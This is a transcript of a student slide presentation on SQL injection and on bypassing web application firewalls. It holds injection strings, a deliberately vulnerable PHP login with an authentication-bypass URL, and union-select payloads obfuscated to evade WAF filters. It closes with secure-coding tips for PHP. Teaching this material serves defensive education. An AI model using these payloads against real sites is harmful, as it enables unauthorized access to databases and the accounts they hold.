All Ab0ut 0f SQL Injection and WAF Bypass Techniques
250 likes | 479 Vues
All Ab0ut 0f SQL Injection and WAF Bypass Techniques. Thatsanai Detdamrongpreeecha Computer science @ King Mongkut's Institute of Technology Ladkrabang. What is SQL Injection ?. Sql injection is code injection Happened when user Inject sql command for change condition
All Ab0ut 0f SQL Injection and WAF Bypass Techniques
E N D
Presentation Transcript
All Ab0ut 0f SQL Injection and WAF Bypass Techniques ThatsanaiDetdamrongpreeecha Computer science @ King Mongkut's Institute of Technology Ladkrabang
What is SQL Injection ? • Sql injection is code injection • Happened when user Inject sql command for change condition • because develop not filtered input from user
SQL Operator • And , && • Or , || • Like • * • ( , ) • < , > • +, - , *, /, %
SQL Comment end of the line • "#" • "--" • "-- " multiple line • /* */
sql command : SELECT first_name, last_name FROM users WHERE user_id = '$id‘ Inject code : SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’ SELECT first_name, last_name FROM users WHERE user_id = 'am’ or ‘am’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘1’=‘1’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘2600’=‘2600’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘HELLO’ or ‘HELLO’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or 1 #’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or true #’
sql command : SELECT first_name, last_name FROM users WHERE user_id = $id Inject code : true ‘1’ or ‘1’ 2 or 2 sql command : SELECT first_name, last_name FROM users WHERE user_id = ($id) Inject code : 1) or (1 2+3) or (5
http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมที่โหลดๆมา/Login_thaicreate/PHP MySQL กับ Login Form ทำระบบ User ล็อกอิน แบบง่าย ๆ ด้วย PHP และ MySQL โดยทำการตรวจสอบ Username และ Password.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.htmlhttp://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
Example • $sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'"; • $result = mysql_query($sql, $db); • if ($result === FALSE) • die('Invalid SQL query'); • if (mysql_num_rows($result) == 1) { • echo "Congrats, WIN!!!\n"; • } • else { • echo "The number of rows is not 1\n"; • } login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
Impact • Get Information in database • Can gaining access system • Etc.
What is Web Application Firewall • Web application Firewall ( WAF ) • Software or Hardware • Emphasis in prevention on the website • Filters all data in application layer • Can detected and prevention website
How to Bypass? • Original • 1’ or ‘1’=‘1 • union all select 1,2,3,4,5 – • union all select 1,2,@@version,4,5 – • Solution • 1’ oR ‘1’=‘1 • uNIonAlLsELeCt 1,2,3,4,5 – • u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
How to Bypass?(cont.) • If Filter or , and • Solve : • Using || instead of or • Using && instead of and
How to Bypass?(cont.) • If Filter where • Solve : • Using limit instead of where • If Filter limit • Solve : • You can Using group by and havinginstead of where
How to Bypass?(cont.) • If Filter whitespace • Solve : • Using %0binstead of whitespace • If Filter ‘ • Solve : • Using 0xXX , unhex(xx)instead of ‘
Top 5 Secure Coding Tips for PHP applications • Filter Input Data • GET , POST , COOKIE • Securing Database Queries • Filter Output Data • htmlspecialchars() • htmlentities() • strip_tags() • strtr() • Error Handling • log_errors = On • display_errors = Off • Preventing other injection attacks
References and Appendix • www.owasp.org • http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/ • http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html • http://thtutz.blogspot.com
